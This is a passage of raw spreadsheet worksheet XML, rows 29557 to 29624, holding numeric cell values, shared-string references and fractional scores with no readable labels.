      <c r="E29557" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29557" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29558" ht="15.75" customHeight="1">
      <c r="A29558" s="1">
        <v>3890.0</v>
      </c>
      <c r="B29558" s="2">
        <v>4.0398717E7</v>
      </c>
      <c r="C29558" s="2" t="s">
        <v>28416</v>
      </c>
      <c r="D29558" s="2">
        <v>1.0</v>
      </c>
      <c r="E29558" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29558" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29559" ht="15.75" customHeight="1">
      <c r="A29559" s="1">
        <v>10046.0</v>
      </c>
      <c r="B29559" s="2">
        <v>5.7103268E7</v>
      </c>
      <c r="C29559" s="2" t="s">
        <v>28417</v>
      </c>
      <c r="D29559" s="2">
        <v>1.0</v>
      </c>
      <c r="E29559" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29559" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29560" ht="15.75" customHeight="1">
      <c r="A29560" s="1">
        <v>10683.0</v>
      </c>
      <c r="B29560" s="2">
        <v>1.4667967E7</v>
      </c>
      <c r="C29560" s="2" t="s">
        <v>28418</v>
      </c>
      <c r="D29560" s="2">
        <v>1.0</v>
      </c>
      <c r="E29560" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29560" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29561" ht="15.75" customHeight="1">
      <c r="A29561" s="1">
        <v>12278.0</v>
      </c>
      <c r="B29561" s="2">
        <v>2.8159351E7</v>
      </c>
      <c r="C29561" s="2" t="s">
        <v>28419</v>
      </c>
      <c r="D29561" s="2">
        <v>1.0</v>
      </c>
      <c r="E29561" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29561" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29562" ht="15.75" customHeight="1">
      <c r="A29562" s="1">
        <v>13050.0</v>
      </c>
      <c r="B29562" s="2">
        <v>3.3161649E7</v>
      </c>
      <c r="C29562" s="2" t="s">
        <v>28420</v>
      </c>
      <c r="D29562" s="2">
        <v>1.0</v>
      </c>
      <c r="E29562" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29562" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29563" ht="15.75" customHeight="1">
      <c r="A29563" s="1">
        <v>13133.0</v>
      </c>
      <c r="B29563" s="2">
        <v>3.3695108E7</v>
      </c>
      <c r="C29563" s="2" t="s">
        <v>28421</v>
      </c>
      <c r="D29563" s="2">
        <v>1.0</v>
      </c>
      <c r="E29563" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29563" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29564" ht="15.75" customHeight="1">
      <c r="A29564" s="1">
        <v>13168.0</v>
      </c>
      <c r="B29564" s="2">
        <v>3.3979847E7</v>
      </c>
      <c r="C29564" s="2" t="s">
        <v>28422</v>
      </c>
      <c r="D29564" s="2">
        <v>1.0</v>
      </c>
      <c r="E29564" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29564" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29565" ht="15.75" customHeight="1">
      <c r="A29565" s="1">
        <v>13221.0</v>
      </c>
      <c r="B29565" s="2">
        <v>3.4219439E7</v>
      </c>
      <c r="C29565" s="2" t="s">
        <v>28423</v>
      </c>
      <c r="D29565" s="2">
        <v>1.0</v>
      </c>
      <c r="E29565" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29565" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29566" ht="15.75" customHeight="1">
      <c r="A29566" s="1">
        <v>13310.0</v>
      </c>
      <c r="B29566" s="2">
        <v>3.4537687E7</v>
      </c>
      <c r="C29566" s="2" t="s">
        <v>28424</v>
      </c>
      <c r="D29566" s="2">
        <v>1.0</v>
      </c>
      <c r="E29566" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29566" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29567" ht="15.75" customHeight="1">
      <c r="A29567" s="1">
        <v>14670.0</v>
      </c>
      <c r="B29567" s="2">
        <v>4.0453467E7</v>
      </c>
      <c r="C29567" s="2" t="s">
        <v>28425</v>
      </c>
      <c r="D29567" s="2">
        <v>1.0</v>
      </c>
      <c r="E29567" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29567" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29568" ht="15.75" customHeight="1">
      <c r="A29568" s="1">
        <v>14843.0</v>
      </c>
      <c r="B29568" s="2">
        <v>4.1046284E7</v>
      </c>
      <c r="C29568" s="2" t="s">
        <v>28426</v>
      </c>
      <c r="D29568" s="2">
        <v>1.0</v>
      </c>
      <c r="E29568" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29568" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29569" ht="15.75" customHeight="1">
      <c r="A29569" s="1">
        <v>14956.0</v>
      </c>
      <c r="B29569" s="2">
        <v>4.1318615E7</v>
      </c>
      <c r="C29569" s="2" t="s">
        <v>28427</v>
      </c>
      <c r="D29569" s="2">
        <v>1.0</v>
      </c>
      <c r="E29569" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29569" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29570" ht="15.75" customHeight="1">
      <c r="A29570" s="1">
        <v>15231.0</v>
      </c>
      <c r="B29570" s="2">
        <v>4.2201777E7</v>
      </c>
      <c r="C29570" s="2" t="s">
        <v>28428</v>
      </c>
      <c r="D29570" s="2">
        <v>1.0</v>
      </c>
      <c r="E29570" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29570" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29571" ht="15.75" customHeight="1">
      <c r="A29571" s="1">
        <v>15807.0</v>
      </c>
      <c r="B29571" s="2">
        <v>4.4237389E7</v>
      </c>
      <c r="C29571" s="2" t="s">
        <v>28429</v>
      </c>
      <c r="D29571" s="2">
        <v>1.0</v>
      </c>
      <c r="E29571" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29571" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29572" ht="15.75" customHeight="1">
      <c r="A29572" s="1">
        <v>16469.0</v>
      </c>
      <c r="B29572" s="2">
        <v>4.6499004E7</v>
      </c>
      <c r="C29572" s="2" t="s">
        <v>28430</v>
      </c>
      <c r="D29572" s="2">
        <v>1.0</v>
      </c>
      <c r="E29572" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29572" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29573" ht="15.75" customHeight="1">
      <c r="A29573" s="1">
        <v>17715.0</v>
      </c>
      <c r="B29573" s="2">
        <v>5.0598776E7</v>
      </c>
      <c r="C29573" s="2" t="s">
        <v>28431</v>
      </c>
      <c r="D29573" s="2">
        <v>1.0</v>
      </c>
      <c r="E29573" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29573" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29574" ht="15.75" customHeight="1">
      <c r="A29574" s="1">
        <v>18031.0</v>
      </c>
      <c r="B29574" s="2">
        <v>5.153502E7</v>
      </c>
      <c r="C29574" s="2" t="s">
        <v>28432</v>
      </c>
      <c r="D29574" s="2">
        <v>1.0</v>
      </c>
      <c r="E29574" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29574" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29575" ht="15.75" customHeight="1">
      <c r="A29575" s="1">
        <v>18680.0</v>
      </c>
      <c r="B29575" s="2">
        <v>5.3571199E7</v>
      </c>
      <c r="C29575" s="2" t="s">
        <v>28433</v>
      </c>
      <c r="D29575" s="2">
        <v>1.0</v>
      </c>
      <c r="E29575" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29575" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29576" ht="15.75" customHeight="1">
      <c r="A29576" s="1">
        <v>18723.0</v>
      </c>
      <c r="B29576" s="2">
        <v>5.3693193E7</v>
      </c>
      <c r="C29576" s="2" t="s">
        <v>28434</v>
      </c>
      <c r="D29576" s="2">
        <v>1.0</v>
      </c>
      <c r="E29576" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29576" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29577" ht="15.75" customHeight="1">
      <c r="A29577" s="1">
        <v>20204.0</v>
      </c>
      <c r="B29577" s="2">
        <v>1.0620504E7</v>
      </c>
      <c r="C29577" s="2" t="s">
        <v>28435</v>
      </c>
      <c r="D29577" s="2">
        <v>1.0</v>
      </c>
      <c r="E29577" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29577" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29578" ht="15.75" customHeight="1">
      <c r="A29578" s="1">
        <v>20931.0</v>
      </c>
      <c r="B29578" s="2">
        <v>1.6424643E7</v>
      </c>
      <c r="C29578" s="2" t="s">
        <v>28436</v>
      </c>
      <c r="D29578" s="2">
        <v>1.0</v>
      </c>
      <c r="E29578" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29578" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29579" ht="15.75" customHeight="1">
      <c r="A29579" s="1">
        <v>21031.0</v>
      </c>
      <c r="B29579" s="2">
        <v>1.7528223E7</v>
      </c>
      <c r="C29579" s="2" t="s">
        <v>28413</v>
      </c>
      <c r="D29579" s="2">
        <v>1.0</v>
      </c>
      <c r="E29579" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29579" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29580" ht="15.75" customHeight="1">
      <c r="A29580" s="1">
        <v>21143.0</v>
      </c>
      <c r="B29580" s="2">
        <v>1.86578E7</v>
      </c>
      <c r="C29580" s="2" t="s">
        <v>28437</v>
      </c>
      <c r="D29580" s="2">
        <v>1.0</v>
      </c>
      <c r="E29580" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29580" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29581" ht="15.75" customHeight="1">
      <c r="A29581" s="1">
        <v>21241.0</v>
      </c>
      <c r="B29581" s="2">
        <v>1.979887E7</v>
      </c>
      <c r="C29581" s="2" t="s">
        <v>28438</v>
      </c>
      <c r="D29581" s="2">
        <v>1.0</v>
      </c>
      <c r="E29581" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29581" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29582" ht="15.75" customHeight="1">
      <c r="A29582" s="1">
        <v>21883.0</v>
      </c>
      <c r="B29582" s="2">
        <v>2.7732672E7</v>
      </c>
      <c r="C29582" s="2" t="s">
        <v>28439</v>
      </c>
      <c r="D29582" s="2">
        <v>1.0</v>
      </c>
      <c r="E29582" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29582" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29583" ht="15.75" customHeight="1">
      <c r="A29583" s="1">
        <v>22830.0</v>
      </c>
      <c r="B29583" s="2">
        <v>4.6422644E7</v>
      </c>
      <c r="C29583" s="2" t="s">
        <v>28439</v>
      </c>
      <c r="D29583" s="2">
        <v>1.0</v>
      </c>
      <c r="E29583" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29583" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29584" ht="15.75" customHeight="1">
      <c r="A29584" s="1">
        <v>24464.0</v>
      </c>
      <c r="B29584" s="2">
        <v>1.095086E7</v>
      </c>
      <c r="C29584" s="2" t="s">
        <v>28440</v>
      </c>
      <c r="D29584" s="2">
        <v>1.0</v>
      </c>
      <c r="E29584" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29584" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29585" ht="15.75" customHeight="1">
      <c r="A29585" s="1">
        <v>26801.0</v>
      </c>
      <c r="B29585" s="2">
        <v>1.8657799E7</v>
      </c>
      <c r="C29585" s="2" t="s">
        <v>28437</v>
      </c>
      <c r="D29585" s="2">
        <v>1.0</v>
      </c>
      <c r="E29585" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29585" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29586" ht="15.75" customHeight="1">
      <c r="A29586" s="1">
        <v>26992.0</v>
      </c>
      <c r="B29586" s="2">
        <v>1.9798869E7</v>
      </c>
      <c r="C29586" s="2" t="s">
        <v>28438</v>
      </c>
      <c r="D29586" s="2">
        <v>1.0</v>
      </c>
      <c r="E29586" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29586" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29587" ht="15.75" customHeight="1">
      <c r="A29587" s="1">
        <v>28643.0</v>
      </c>
      <c r="B29587" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C29587" s="2" t="s">
        <v>28441</v>
      </c>
      <c r="D29587" s="2">
        <v>1.0</v>
      </c>
      <c r="E29587" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29587" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29588" ht="15.75" customHeight="1">
      <c r="A29588" s="1">
        <v>28701.0</v>
      </c>
      <c r="B29588" s="2">
        <v>2.7732671E7</v>
      </c>
      <c r="C29588" s="2" t="s">
        <v>28439</v>
      </c>
      <c r="D29588" s="2">
        <v>1.0</v>
      </c>
      <c r="E29588" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29588" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29589" ht="15.75" customHeight="1">
      <c r="A29589" s="1">
        <v>28941.0</v>
      </c>
      <c r="B29589" s="2">
        <v>2.9646296E7</v>
      </c>
      <c r="C29589" s="2" t="s">
        <v>28439</v>
      </c>
      <c r="D29589" s="2">
        <v>1.0</v>
      </c>
      <c r="E29589" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29589" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29590" ht="15.75" customHeight="1">
      <c r="A29590" s="1">
        <v>33323.0</v>
      </c>
      <c r="B29590" s="2">
        <v>7541753.0</v>
      </c>
      <c r="C29590" s="2" t="s">
        <v>28442</v>
      </c>
      <c r="D29590" s="2">
        <v>1.0</v>
      </c>
      <c r="E29590" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29590" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="29591" ht="15.75" customHeight="1">
      <c r="A29591" s="1">
        <v>5738.0</v>
      </c>
      <c r="B29591" s="2">
        <v>4.6613231E7</v>
      </c>
      <c r="C29591" s="2" t="s">
        <v>28443</v>
      </c>
      <c r="D29591" s="2">
        <v>1.0</v>
      </c>
      <c r="E29591" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29591" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="29592" ht="15.75" customHeight="1">
      <c r="A29592" s="1">
        <v>8444.0</v>
      </c>
      <c r="B29592" s="2">
        <v>5.3959656E7</v>
      </c>
      <c r="C29592" s="2" t="s">
        <v>28444</v>
      </c>
      <c r="D29592" s="2">
        <v>1.0</v>
      </c>
      <c r="E29592" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29592" s="2">
        <v>0.09722222222222221</v>
      </c>
    </row>
    <row r="29593" ht="15.75" customHeight="1">
      <c r="A29593" s="1">
        <v>10249.0</v>
      </c>
      <c r="B29593" s="2">
        <v>5.7547535E7</v>
      </c>
      <c r="C29593" s="2" t="s">
        <v>28445</v>
      </c>
      <c r="D29593" s="2">
        <v>1.0</v>
      </c>
      <c r="E29593" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29593" s="2">
        <v>0.0972222222222222</v>
      </c>
    </row>
    <row r="29594" ht="15.75" customHeight="1">
      <c r="A29594" s="1">
        <v>33164.0</v>
      </c>
      <c r="B29594" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C29594" s="2" t="s">
        <v>28446</v>
      </c>
      <c r="D29594" s="2">
        <v>1.0</v>
      </c>
      <c r="E29594" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29594" s="2">
        <v>0.09694989106753814</v>
      </c>
    </row>
    <row r="29595" ht="15.75" customHeight="1">
      <c r="A29595" s="1">
        <v>849.0</v>
      </c>
      <c r="B29595" s="2">
        <v>2.1716426E7</v>
      </c>
      <c r="C29595" s="2" t="s">
        <v>28447</v>
      </c>
      <c r="D29595" s="2">
        <v>1.0</v>
      </c>
      <c r="E29595" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29595" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29596" ht="15.75" customHeight="1">
      <c r="A29596" s="1">
        <v>2754.0</v>
      </c>
      <c r="B29596" s="2">
        <v>3.5100614E7</v>
      </c>
      <c r="C29596" s="2" t="s">
        <v>28448</v>
      </c>
      <c r="D29596" s="2">
        <v>1.0</v>
      </c>
      <c r="E29596" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29596" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29597" ht="15.75" customHeight="1">
      <c r="A29597" s="1">
        <v>6487.0</v>
      </c>
      <c r="B29597" s="2">
        <v>4.8684065E7</v>
      </c>
      <c r="C29597" s="2" t="s">
        <v>28449</v>
      </c>
      <c r="D29597" s="2">
        <v>1.0</v>
      </c>
      <c r="E29597" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29597" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29598" ht="15.75" customHeight="1">
      <c r="A29598" s="1">
        <v>6631.0</v>
      </c>
      <c r="B29598" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C29598" s="2" t="s">
        <v>28450</v>
      </c>
      <c r="D29598" s="2">
        <v>1.0</v>
      </c>
      <c r="E29598" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29598" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29599" ht="15.75" customHeight="1">
      <c r="A29599" s="1">
        <v>7970.0</v>
      </c>
      <c r="B29599" s="2">
        <v>5.2696347E7</v>
      </c>
      <c r="C29599" s="2" t="s">
        <v>28451</v>
      </c>
      <c r="D29599" s="2">
        <v>1.0</v>
      </c>
      <c r="E29599" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29599" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29600" ht="15.75" customHeight="1">
      <c r="A29600" s="1">
        <v>9116.0</v>
      </c>
      <c r="B29600" s="2">
        <v>5.5205968E7</v>
      </c>
      <c r="C29600" s="2" t="s">
        <v>28452</v>
      </c>
      <c r="D29600" s="2">
        <v>1.0</v>
      </c>
      <c r="E29600" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29600" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29601" ht="15.75" customHeight="1">
      <c r="A29601" s="1">
        <v>14466.0</v>
      </c>
      <c r="B29601" s="2">
        <v>3.9483201E7</v>
      </c>
      <c r="C29601" s="2" t="s">
        <v>28453</v>
      </c>
      <c r="D29601" s="2">
        <v>1.0</v>
      </c>
      <c r="E29601" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29601" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29602" ht="15.75" customHeight="1">
      <c r="A29602" s="1">
        <v>15974.0</v>
      </c>
      <c r="B29602" s="2">
        <v>4.4848824E7</v>
      </c>
      <c r="C29602" s="2" t="s">
        <v>28454</v>
      </c>
      <c r="D29602" s="2">
        <v>1.0</v>
      </c>
      <c r="E29602" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29602" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29603" ht="15.75" customHeight="1">
      <c r="A29603" s="1">
        <v>21222.0</v>
      </c>
      <c r="B29603" s="2">
        <v>1.9609659E7</v>
      </c>
      <c r="C29603" s="2" t="s">
        <v>28455</v>
      </c>
      <c r="D29603" s="2">
        <v>1.0</v>
      </c>
      <c r="E29603" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29603" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29604" ht="15.75" customHeight="1">
      <c r="A29604" s="1">
        <v>22905.0</v>
      </c>
      <c r="B29604" s="2">
        <v>4.8147735E7</v>
      </c>
      <c r="C29604" s="2" t="s">
        <v>28456</v>
      </c>
      <c r="D29604" s="2">
        <v>1.0</v>
      </c>
      <c r="E29604" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29604" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29605" ht="15.75" customHeight="1">
      <c r="A29605" s="1">
        <v>31990.0</v>
      </c>
      <c r="B29605" s="2">
        <v>5329394.0</v>
      </c>
      <c r="C29605" s="2" t="s">
        <v>28457</v>
      </c>
      <c r="D29605" s="2">
        <v>1.0</v>
      </c>
      <c r="E29605" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29605" s="2">
        <v>0.09694989106753811</v>
      </c>
    </row>
    <row r="29606" ht="15.75" customHeight="1">
      <c r="A29606" s="1">
        <v>339.0</v>
      </c>
      <c r="B29606" s="2">
        <v>1.5855325E7</v>
      </c>
      <c r="C29606" s="2" t="s">
        <v>28458</v>
      </c>
      <c r="D29606" s="2">
        <v>1.0</v>
      </c>
      <c r="E29606" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29606" s="2">
        <v>0.09649122807017545</v>
      </c>
    </row>
    <row r="29607" ht="15.75" customHeight="1">
      <c r="A29607" s="1">
        <v>16522.0</v>
      </c>
      <c r="B29607" s="2">
        <v>4.6653888E7</v>
      </c>
      <c r="C29607" s="2" t="s">
        <v>28459</v>
      </c>
      <c r="D29607" s="2">
        <v>1.0</v>
      </c>
      <c r="E29607" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29607" s="2">
        <v>0.09649122807017545</v>
      </c>
    </row>
    <row r="29608" ht="15.75" customHeight="1">
      <c r="A29608" s="1">
        <v>9882.0</v>
      </c>
      <c r="B29608" s="2">
        <v>5.6750173E7</v>
      </c>
      <c r="C29608" s="2" t="s">
        <v>28460</v>
      </c>
      <c r="D29608" s="2">
        <v>1.0</v>
      </c>
      <c r="E29608" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29608" s="2">
        <v>0.09649122807017543</v>
      </c>
    </row>
    <row r="29609" ht="15.75" customHeight="1">
      <c r="A29609" s="1">
        <v>16236.0</v>
      </c>
      <c r="B29609" s="2">
        <v>4.5748525E7</v>
      </c>
      <c r="C29609" s="2" t="s">
        <v>28461</v>
      </c>
      <c r="D29609" s="2">
        <v>1.0</v>
      </c>
      <c r="E29609" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29609" s="2">
        <v>0.09623015873015874</v>
      </c>
    </row>
    <row r="29610" ht="15.75" customHeight="1">
      <c r="A29610" s="1">
        <v>1136.0</v>
      </c>
      <c r="B29610" s="2">
        <v>2.4209334E7</v>
      </c>
      <c r="C29610" s="2" t="s">
        <v>28462</v>
      </c>
      <c r="D29610" s="2">
        <v>1.0</v>
      </c>
      <c r="E29610" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29610" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="29611" ht="15.75" customHeight="1">
      <c r="A29611" s="1">
        <v>5194.0</v>
      </c>
      <c r="B29611" s="2">
        <v>4.4835014E7</v>
      </c>
      <c r="C29611" s="2" t="s">
        <v>28463</v>
      </c>
      <c r="D29611" s="2">
        <v>1.0</v>
      </c>
      <c r="E29611" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29611" s="2">
        <v>0.09623015873015872</v>
      </c>
    </row>
    <row r="29612" ht="15.75" customHeight="1">
      <c r="A29612" s="1">
        <v>13689.0</v>
      </c>
      <c r="B29612" s="2">
        <v>3.6102385E7</v>
      </c>
      <c r="C29612" s="2" t="s">
        <v>28464</v>
      </c>
      <c r="D29612" s="2">
        <v>1.0</v>
      </c>
      <c r="E29612" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29612" s="2">
        <v>0.09623015873015871</v>
      </c>
    </row>
    <row r="29613" ht="15.75" customHeight="1">
      <c r="A29613" s="1">
        <v>24485.0</v>
      </c>
      <c r="B29613" s="2">
        <v>1.1050499E7</v>
      </c>
      <c r="C29613" s="2" t="s">
        <v>28465</v>
      </c>
      <c r="D29613" s="2">
        <v>1.0</v>
      </c>
      <c r="E29613" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29613" s="2">
        <v>0.09623015873015871</v>
      </c>
    </row>
    <row r="29614" ht="15.75" customHeight="1">
      <c r="A29614" s="1">
        <v>30570.0</v>
      </c>
      <c r="B29614" s="2">
        <v>4.0969541E7</v>
      </c>
      <c r="C29614" s="2" t="s">
        <v>28466</v>
      </c>
      <c r="D29614" s="2">
        <v>1.0</v>
      </c>
      <c r="E29614" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29614" s="2">
        <v>0.09611992945326278</v>
      </c>
    </row>
    <row r="29615" ht="15.75" customHeight="1">
      <c r="A29615" s="1">
        <v>7262.0</v>
      </c>
      <c r="B29615" s="2">
        <v>5.0766196E7</v>
      </c>
      <c r="C29615" s="2" t="s">
        <v>28467</v>
      </c>
      <c r="D29615" s="2">
        <v>1.0</v>
      </c>
      <c r="E29615" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29615" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="29616" ht="15.75" customHeight="1">
      <c r="A29616" s="1">
        <v>14711.0</v>
      </c>
      <c r="B29616" s="2">
        <v>4.0623081E7</v>
      </c>
      <c r="C29616" s="2" t="s">
        <v>28468</v>
      </c>
      <c r="D29616" s="2">
        <v>1.0</v>
      </c>
      <c r="E29616" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29616" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="29617" ht="15.75" customHeight="1">
      <c r="A29617" s="1">
        <v>31707.0</v>
      </c>
      <c r="B29617" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C29617" s="2" t="s">
        <v>28469</v>
      </c>
      <c r="D29617" s="2">
        <v>1.0</v>
      </c>
      <c r="E29617" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29617" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="29618" ht="15.75" customHeight="1">
      <c r="A29618" s="1">
        <v>18287.0</v>
      </c>
      <c r="B29618" s="2">
        <v>5.2301392E7</v>
      </c>
      <c r="C29618" s="2" t="s">
        <v>28470</v>
      </c>
      <c r="D29618" s="2">
        <v>1.0</v>
      </c>
      <c r="E29618" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29618" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="29619" ht="15.75" customHeight="1">
      <c r="A29619" s="1">
        <v>19836.0</v>
      </c>
      <c r="B29619" s="2">
        <v>5.7059731E7</v>
      </c>
      <c r="C29619" s="2" t="s">
        <v>28471</v>
      </c>
      <c r="D29619" s="2">
        <v>1.0</v>
      </c>
      <c r="E29619" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29619" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="29620" ht="15.75" customHeight="1">
      <c r="A29620" s="1">
        <v>28197.0</v>
      </c>
      <c r="B29620" s="2">
        <v>2.5015258E7</v>
      </c>
      <c r="C29620" s="2" t="s">
        <v>18794</v>
      </c>
      <c r="D29620" s="2">
        <v>1.0</v>
      </c>
      <c r="E29620" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29620" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="29621" ht="15.75" customHeight="1">
      <c r="A29621" s="1">
        <v>31681.0</v>
      </c>
      <c r="B29621" s="2">
        <v>5188459.0</v>
      </c>
      <c r="C29621" s="2" t="s">
        <v>28472</v>
      </c>
      <c r="D29621" s="2">
        <v>1.0</v>
      </c>
      <c r="E29621" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29621" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="29622" ht="15.75" customHeight="1">
      <c r="A29622" s="1">
        <v>1272.0</v>
      </c>
      <c r="B29622" s="2">
        <v>2.5301229E7</v>
      </c>
      <c r="C29622" s="2" t="s">
        <v>28473</v>
      </c>
      <c r="D29622" s="2">
        <v>1.0</v>
      </c>
      <c r="E29622" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29622" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="29623" ht="15.75" customHeight="1">
      <c r="A29623" s="1">
        <v>15366.0</v>
      </c>
      <c r="B29623" s="2">
        <v>4.2724437E7</v>
      </c>
      <c r="C29623" s="2" t="s">
        <v>28474</v>
      </c>
      <c r="D29623" s="2">
        <v>1.0</v>
      </c>
      <c r="E29623" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29623" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="29624" ht="15.75" customHeight="1">
      <c r="A29624" s="1">
        <v>15443.0</v>
      </c>
      <c r="B29624" s="2">
        <v>4.3008532E7</v>
      </c>
      <c r="C29624" s="2" t="s">
        <v>28475</v>
      </c>
      <c r="D29624" s="2">
        <v>1.0</v>
      </c>
